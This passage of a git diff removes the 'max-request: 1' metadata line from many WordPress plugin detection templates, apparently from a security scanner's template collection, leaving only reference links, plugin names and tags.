+7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index ac77f4e5f5..f68ad2a6bf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: 